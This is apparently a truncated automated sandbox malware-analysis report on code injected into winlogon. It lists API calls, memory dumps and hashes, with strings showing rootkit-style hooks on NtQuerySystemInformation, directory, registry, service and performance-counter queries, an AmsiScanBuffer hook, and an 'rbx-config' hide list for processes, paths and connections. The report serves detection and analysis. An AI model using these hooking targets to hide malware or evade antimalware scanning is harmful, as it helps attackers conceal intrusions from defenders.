                                  • Instruction Fuzzy Hash: 25115E21B906C382FB609763E94D39922D0B758385F52411FA416811E3EF78C6D89F71

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                  • String ID:
                                  • API String ID: 3733156554-0
                                  • Opcode ID: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                  • Instruction ID: ae54b5527d6201f9077ce8f5f74f5325775aac870c22087e7692ff2d3c54d51a
                                  • Opcode Fuzzy Hash: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                  • Instruction Fuzzy Hash: 01F03A26268B85C0D630DB07E45934AA7A1F3C8BD8F65411AFA8D47B6ACF38C2C18F10

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 000002E991751724: GetProcessHeap.KERNEL32 ref: 000002E99175172F
                                    • Part of subcall function 000002E991751724: HeapAlloc.KERNEL32 ref: 000002E99175173E
                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917517AE
                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917517DB
                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917517F5
                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751815
                                    • Part of subcall function 000002E991751724: RegCloseKey.KERNELBASE ref: 000002E991751830
                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751850
                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E99175186B
                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E99175188B
                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917518A6
                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917518C6
                                  • SleepEx.KERNELBASE ref: 000002E991751BDF
                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917518E1
                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751901
                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E99175191C
                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E99175193C
                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E991751957
                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751977
                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E991751992
                                    • Part of subcall function 000002E991751724: RegCloseKey.KERNELBASE ref: 000002E99175199C
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                  • String ID:
                                  • API String ID: 948135145-0
                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                  • Instruction ID: 08ddea5e06037298be233082ecc813bccc9da343497e1d7d67a6079a4d530855
                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                  • Instruction Fuzzy Hash: 47312F653806C342FB509B27D55937923A4FB44BC1F1A582B8E0B87297EF35D8D08B34

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 408 2e99175f370-2e99175f39f VirtualProtect
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                  • Instruction ID: 13e7b84320865d9b31e569f8acddc3596c4c77e6deba9caaafb55c679f67a583
                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                  • Instruction Fuzzy Hash: BFD01225735581C3E300DB22D8497956368F398741FC1400AE949C2695CF7CC299CF61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 409 2e99178f370-2e99178f39f VirtualProtect
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                  • Instruction ID: 886f5c1ab378c0d05e7c9868e2c181318b2bc2ed936de4644c4fb46cb538a86f
                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                  • Instruction Fuzzy Hash: 2AD01225B71591C3E300DF22D8497966328F398702FC1400BE94A82695DF7CC299CF60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                  • API String ID: 2119608203-3850299575
                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction ID: 901aa4b36f05a76b6b4ae484e9299b70b72537bbdfdb60c69d76e30a85a141aa
                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction Fuzzy Hash: 75B18E22354AD282EB658F27D5087A9A3A4F744B84F46501FEE0993BA6DF35CDC0CB70
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                  • API String ID: 2119608203-3850299575
                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction ID: 28712f5269c78861175d6a405fbdd04cbb5a234239551295be649858de4bdf0c
                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction Fuzzy Hash: 1EB19B22354AD286FB648F2BD4887A9A3A4F744B84F42505BEE0953B96DF35CDC4CB70
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                  • Instruction ID: da5e7db53daeae2acb595a0c748e7def4dfc93d571fbfc65a1eff29dae58969d
                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                  • Instruction Fuzzy Hash: 2E315272245BC18AEB608F62E8483DD7364F784788F45402FDA4E47B99DF78C588CB20
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                  • Instruction ID: 3b695e613dbd15be2a6d4b3d3f45fb4354c2d66b7e0ca5ac822997602774bf22
                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                  • Instruction Fuzzy Hash: 7D315072245BC186EB608F65E8843EE7364F784749F45412FDA4E47B9ADF78C588CB20
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                  • Instruction ID: 39225dbaa60ab54407ea9405c81e92153366d86cbcf1a941c4e79b092faf822f
                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                  • Instruction Fuzzy Hash: 9341B436214FC186D760CF26E84839E73A4F789798F51011AEA9D87B99DF38C195CF10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                  • Instruction ID: 6a42c600588de03add4d48890d9448702fe8a2d3eb5308a9508b0b8b4b6a9d5f
                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                  • Instruction Fuzzy Hash: 01415F36254FC186E760CF26E88439E73A4F788758F51021BEA9D47B9ADF38C599CB10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID:
                                  • API String ID: 1164774033-0
                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                  • Instruction ID: 1554a8dfa1abde21d920324e67176d06f9fd64292f37c0f1049a948324637e2a
                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                  • Instruction Fuzzy Hash: 72A106227647C249FB20DB77E4483AE6BA1F741BA4F15411BDE9927A9ADF38C4C1CB10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID:
                                  • API String ID: 1164774033-0
                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                  • Instruction ID: 7cd24e4daa130da9d4b8545705f21363768520c28e30343eb656b0821046e916
                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                  • Instruction Fuzzy Hash: 67A12A227446C24AFB20DB77E4C83AD6BA1F7417A4F15415FDE8927A9BDA38C4C1CB20

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                  • API String ID: 2135414181-3414887735
                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction ID: a031a39ca682313daa7caf78874a0e988bedd57c9d87916451c15765c2fa030d
                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction Fuzzy Hash: 1A713F36350A9289EB109F37E89969D3374FB84B89F42111BDD4E57B2ADF34C488CB50
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                  • API String ID: 1735320900-4225371247
                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction ID: 97be40598d99cc7e2251af5994d86417916a17761c02b0069a8ae3958691b5c1
                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction Fuzzy Hash: 8451ADA4184ACBA5FB00EFABEC9D7D42720B740756F82455B941E02567DE3882DECFB0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                  • String ID: d
                                  • API String ID: 2005889112-2564639436
                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                  • Instruction ID: e0cbdeca4fa127c4fee59220e50efaa62b1f9ab6c743b42560bf565422515f9d
                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                  • Instruction Fuzzy Hash: 5A514A72250B859AEB24CF62E84C35A77A1F788FD9F45412ADE4A47719EF3CC089CB11
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                  • String ID: d
                                  • API String ID: 2005889112-2564639436
                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                  • Instruction ID: 9c6fbcc56ab669301fc2cb7a6bd420fd42f5d085b0e9173079ef8964857cb29e
                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                  • Instruction Fuzzy Hash: 0C517D72240B959AE720CF66E84835A77A1F788F99F45412ADE4E07729EF3CC089CB10
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd
                                  Similarity
                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                  • API String ID: 740688525-1880043860
                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                  • Instruction ID: 7d66cee0f260e76ec70aa2cd8dcc72244016b7b75c0c0036f687b7c970e7b761
                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                  • Instruction Fuzzy Hash: BA51D32178178651FA149B27E8883A52250BB49BB0F5A0B2B9E3D477D2DF38C486CB60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                  • Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd
                                  Similarity
                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                  • String ID: \GPU Engine(*)\Running Time
                                  • API String ID: 1943346504-1805530042
                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                  • Instruction ID: 686f2a0a3ad37667bae304d8adfbfae6df89671fbb531ce467dde5e0e0c05cee
                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                  • Instruction Fuzzy Hash: 6F31C326740AC297F721CF13E80C769A7A0F788BD5F46452ADE4983636DF38C4968B60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                  • Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
